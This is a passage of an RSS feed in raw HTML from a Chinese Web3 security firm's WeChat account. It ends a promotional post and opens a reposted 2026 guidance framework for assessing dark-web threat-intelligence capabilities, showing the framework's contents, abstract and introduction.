Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，围绕安全、合规与技术前沿展开深入探讨，共同推动 Web3 生态迈向更加稳健的发展。如果您对 AI &amp; Web3 安全、合规及前沿技术感兴趣，欢迎莅临我们的展位与我们面对面交流。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">香港见!</span></span></p></b></div><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504627&amp;idx=1&amp;sn=9669acd8ecce92eccc5a6c188286510c&amp;scene=21#wechat_redirect" textvalue="暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）" data-itemshowtype="0" linktype="text" data-linktype="2">暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504616&amp;idx=1&amp;sn=95677483334baedb3127bdc0911fa2f8&amp;scene=21#wechat_redirect" textvalue="慢雾：如何评估加密反洗钱工具的有效性" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾：如何评估加密反洗钱工具的有效性</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504607&amp;idx=1&amp;sn=49e70d092b5e2e4d7278e85d822643f8&amp;scene=21#wechat_redirect" textvalue="活动回顾｜慢雾创始人余弦出席首届 Agentic AI 创新与安全论坛" data-itemshowtype="0" linktype="text" data-linktype="2">活动回顾｜慢雾创始人余弦出席首届 Agentic AI 创新与安全论坛</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504594&amp;idx=1&amp;sn=88d0a2ea27ea5f4bd87967e3411848f6&amp;scene=21#wechat_redirect" textvalue="Odaily专访余弦：Anthropic核弹级新模型泄漏，如何影响加密安全攻防？" data-itemshowtype="11" linktype="text" data-linktype="2">Odaily专访余弦：Anthropic核弹级新模型泄漏，如何影响加密安全攻防？</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504592&amp;idx=1&amp;sn=5b14e6284530b087155c3c9b13b86e3c&amp;scene=21#wechat_redirect" textvalue="慢雾：Web3 安全年框服务全面升级" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾：Web3 安全年框服务全面升级</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages js_insertlocalimg wxw-img" data-aistatus="1" data-cropselx1="0" data-cropselx2="578" data-cropsely1="0" data-cropsely2="1973" data-fileid="100009827" data-ratio="3.9814814814814814" data-s="300,640" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=81074fc1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FqsQ2ibEw5pLbEP8f4tadFenoLauzHpicWdWbVap3aia38LUGPflBho9ibDHXjoG5fecGJSaYa4S4zYdoicXibSmjv9tg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=c6560a4c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504713%26idx%3D1%26sn%3Db3c6dee54d890e1751ac7bb28d28bc74">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 13 Apr 2026 19:32:00 +0800</pubDate>
    </item>
    <item>
      <title>暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504627&amp;idx=1&amp;sn=9669acd8ecce92eccc5a6c188286510c</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>慢雾科技</span> <span>2026-04-10 12:00</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=1159b7fa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCJPQwJbtceEuzFhIB7bRG0QBs3N3TmjDNiay0XnQtrocHZaqmTUVTybaJuwoMCVACqyVlMDMAsJ6bWEhMQnRVBaialIpsOwMmHicY%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div><span leaf="">注：本文转载自<a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkzMDE5MDI5Mg==&amp;mid=2247510935&amp;idx=2&amp;sn=d20e55f013f37c0851bd573c9c656ac3&amp;scene=21#wechat_redirect" textvalue="暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）" data-itemshowtype="0" linktype="text" data-linktype="2">数说安全</a></span><p style="text-align:center;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-size: 36pt;line-height: 150%;font-variant: normal;text-transform: none;font-family:黑体;"><strong><span leaf=""><span textstyle="" style="font-size: 24px;">暗网情报技术能力框架及参考指标体系</span></span></strong></span></p><p style="text-align:center;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-size: 18pt;line-height: 150%;font-variant: normal;text-transform: none;font-family:黑体;"><strong><span leaf=""><span textstyle="" style="font-size: 20px;">—— 指导性技术文件 ——</span></span></strong></span></p><p style="text-align:center;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-size: 18pt;line-height: 150%;font-variant: normal;text-transform: none;font-family:黑体;"><strong><span leaf=""><span textstyle="" style="font-size: 20px;">（2026版）</span></span></strong></span></p><p style="text-align:center;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">版本编号：DW-TI-CF-2026</span></span></p><p style="text-align:center;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;border-bottom: 1.5pt solid windowtext;padding: 0pt;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">发布时间：2026年4月</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">主要起草单位：</span></strong></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">北京零零信安科技有限公司</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">发布方：</span></strong></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">数世咨询</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">联合发布方：</span></strong></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 8px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">中关村华安关键信息基础设施安全保护联盟（关保联盟）</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 8px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">奇安信威胁情报中心</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 8px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">绿盟科技鹰眼安全运营中心</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 8px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">北京微步在线科技有限公司</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 8px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">PCSA安全研究院</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 8px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">厦门慢雾科技有限公司</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 8px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">北京赛博英杰科技有限公司</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 8px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">数说安全</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span style="font-size: 12pt;line-height: 150%;font-family:宋体;" data-pm-slice="0 0 []"><span leaf="">特别鸣谢：正奇学院</span></span></span></p><p style="margin-bottom: 16px;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">目录</span></span></strong></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">摘要	4</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">关键词	5</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第一章 绪论	5</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">1.1. 研究背景与意义	5</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">1.2. 国内暗网威胁生态现状	6</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">1.3. 现有评估体系存在的问题	6</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">1.4. 本框架编制依据与参考标准	8</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">1.5. 框架适用对象与使用场景	9</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第二章 总体设计	10</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">2.1. 设计原则	10</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">2.2. 框架整体结构	11</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">2.3. 能力分级定义	11</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">2.4. 评估范围与边界说明	12</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第三章 Traditional Dark Web 威胁源采集和反爬对抗能力	12</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">3.1. 威胁源采集广度	13</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">3.2. 威胁源采集深度	15</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">3.3. 防御策略 / 反爬对抗能力	17</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">3.4. 情报采集时效性	20</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">3.5. 暗网波动对抗能力	22</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第四章 Dark Web Lite 威胁源采集能力	23</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">4.1. 威胁源采集广度	24</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">4.2. 威胁源采集内容解析度	26</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">4.3. 威胁源采集量	27</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">4.4. 威胁源采集效果优化	29</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第五章 暗网情报智能分析能力	31</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">5.1. 关键实体信息提取	31</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">5.2. 情报分级分类	33</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">5.3. 情报分析时效性	35</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">5.4. 多维度向量检索	36</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">5.5. 情报知识图谱构建	38</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第六章 暗网情报高保真复制和持久化存档能力	39</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">6.1. 高保真复制	40</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">6.2. 多媒体解析与向量检索	42</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">6.3. 持久化存档稳定性	44</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">6.4. 风险控制与使用便利性	45</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第七章 中文暗网生态环境威胁识别能力	47</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">7.1. 中文 Traditional Dark Web 识别	48</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">7.2. 中文 Dark Web Lite 识别	49</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">7.3. 侵公威胁源识别	51</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第八章 海量泄露数据知识库能力	53</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">8.1. 历史知识库积累规模	53</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">8.2. 新增数据扩展速度	55</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">8.3. 数据库响应速度	56</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第九章 事件处置与响应闭环能力	58</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">9.1. 暗网事件风险等级研判	58</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">9.2. 协助泄露源调查	60</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">9.3. 危机应对指导	62</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第十章 2026版框架体系结语	63</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">第十一章 未来展望	64</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">11.1. 设计目的	64</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">11.2. 暗网威胁生态未来演变趋势	65</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">11.3. 暗网情报技术能力未来发展方向	66</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">11.4. 本框架未来迭代方向	67</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 15px;">11.5. 结语	67</span></span></p><p style="margin-bottom: 16px;"><span leaf=""><span textstyle="" style="font-size: 15px;">参考文献	68</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架由数世咨询发布，北京零零信安科技有限公司作为主要起草单位，与中关村华安关键信息基础设施安全保护联盟（关保联盟）、奇安信威胁情报中心、绿盟科技鹰眼安全运营中心、北京微步在线科技有限公司、PCSA（行业云安全能力者联盟）智御未来安全研究院、厦门慢雾科技有限公司、北京赛博英杰科技有限公司、数说安全</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等机构联合发布。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">框架聚焦网络安全领域</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">能力，全面覆盖</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Traditional Dark Web（传统暗网）</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite（轻暗网）</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">双生态，构建包含</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">威胁源采集与反爬对抗、智能分析、高保真存档、中文生态识别、海量泄露数据治理、事件处置与响应闭环</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">在内的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">七大核心能力域</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，形成全链路、可量化、可落地的技术能力评估体系。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">框架立足国内暗网威胁实战特征，针对数据泄露、勒索软件、IAB 交易、侵公威胁等本土高发风险，明确统一分级标准与量化指标参数，解决当前行业能力定义模糊、评估主观化、标准不统一、本土化适配不足等突出问题。本框架为指导性参考文件，</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">不设强制性标准与固定权重</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，可灵活适配安全厂商、政企机构、监管与研究单位在能力自评、供应商选型、产品研发、安全运营、行业对标等场景使用。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">随着暗网威胁持续迭代演化，本框架旨在为行业提供统一、科学、实战化的能力标尺，推动国内暗网情报能力向</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">体系化、专业化、实战化</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">方向高质量发展。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">鉴于我国暗网情报技术领域与国际水平存在约10年代差，本框架当前设计主要参考国际已成熟的技术体系。为前瞻性应对暗网犯罪生态的演进，报告最后特别增加“未来展望”章节，基于国际前沿技术与趋势进行预研，以提升框架对于我国暗网情报能力建设的战略指导性和长期适用性。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style=""><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">关键词</span></span></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报；Traditional Dark Web；Dark Web Lite；中文暗网；数据泄露监测；勒索软件；反爬对抗；高保真存档；应急响应；能力框架</span></span></p><p style="margin-bottom: 16px;"><span data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 16px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong><span leaf=""><span textstyle="" style="font-size: 15px;color: rgb(255, 41, 65);">点击左下角原文链接下载pdf报告。</span></span></strong></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第一章 </span></span></strong></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">绪论</span></span></strong></span></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">绪论部分主要阐述本框架的研究背景、现实意义、国内暗网威胁生态现状、当前行业存在的突出问题、编制依据与参考标准，以及框架的适用对象与使用场景，为后续能力体系设计提供整体逻辑与定位支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">1.1.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">研究背景与意义</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">近年来，全球网络犯罪持续向暗网迁移，勒索软件攻击、数据泄露交易、RaaS 产业化、黑客组织协作、IAB 买卖与侵公类威胁在暗网生态内呈规模化、常态化、组织化趋势，已成为危害关键信息基础设施、企业数据安全与社会公共利益的突出风险。传统威胁情报体系对暗网威胁覆盖不足、采集能力参差不齐、分析标准不统一、评估维度缺乏共识，导致政企机构在暗网情报能力建设、供应商选型、服务质量判定、安全运营闭环等方面缺少统一、可量化、可落地的参考依据。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">在此背景下，构建一套覆盖</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报威胁源采集、反爬对抗、智能分析、高保真存档、中文暗网识别、海量泄露数据治理、事件应急响应</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span 